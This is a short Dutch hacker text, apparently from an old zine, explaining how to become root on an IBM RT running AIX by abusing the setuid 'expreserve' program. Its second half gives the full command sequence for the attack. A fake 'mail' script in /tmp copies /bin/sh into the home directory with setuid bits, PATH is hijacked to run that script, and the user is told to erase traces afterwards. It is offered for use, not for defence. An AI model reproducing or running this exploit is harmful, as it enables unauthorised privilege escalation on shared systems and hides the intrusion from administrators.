|
|
|
Zo wordt je 'root' op IBM RT onder AIX | |
| We weten allemaal dat UNIX nu niet een van de veiligste besturingssystemen is. Onlangs hebben we bij ons op school een foutje gevonden in het AIX-systeem dat draait op een IBM RT, die weer aangesloten zit op een grote computer. De fout zit eigenlijk in het programma "expreserve" dat mail stuurt aan een gebruiker bij het inloggen, als hij uit het systeem is gegooid terwijl hij bezig was een file te editten in VI (de UNIX on-screen editor). "expreserve" zorgt ervoor dat deze file bewaard blijft, totdat de gebruiker het verwijdert of kopieert naar zijn eigen directory. Omdat "expreserve" onder root-privilege werkt, kan men dus ook (indien dit aan te passen is), de SHELL kopieren naar zijn eigen directory. Dit gaat met een kleine omweg prima (tot mijn grote vreugde) Het komt hier op neer, dat we het programma "mail" simuleren. Dit programma zetten we in de directory /tmp en kopieert de SHELL naar de gewenste directory, Vervolgens zorgen we voor een te editten file die afgebroken wordt, waardoor er in de directory /tmp een file Exyyyy (met yyyy is een nummer) komt te staan. Dan veranderen we het zoekpad in :.:/bin:/usr/bin:. Hierdoor wordt er eerst in de huidige (.) directory gezocht naar de file "mail". Deze wordt uitgevoerd en kopieert de SHELL naar je eigen directory. Dan moet je |
alle sporen weer eventjes uitwissen en de file "pp" opstarten. Als je alles goed gedaan hebt, verschijnt er als prompt: # (met een vrolijk knipperende cursor) als teken dat je ROOT bent (hiep hiep hoera) cd /tmp cat mail cp /bin/sh (home dir)/pp chmod 6711 (home dir)/pp ^d vi pa (insert 10000 a's) :sh ls -al Dan moet je de file die op jouw login-name staat en begint met Ex????? hebben: PATH=:.:/bin:/usr/bin: export PATH /usr/lib/expreserve Ex????? exit :q! rm pa Herhaal nu: vi -r pa en: q! Doe dit tot Ex????? en Rx????? uit de tmp directory zijn verdwenen. :q! rm mail cd pp vanaf hier heb je ROOT-privilege, dus pas op met wat je doet! |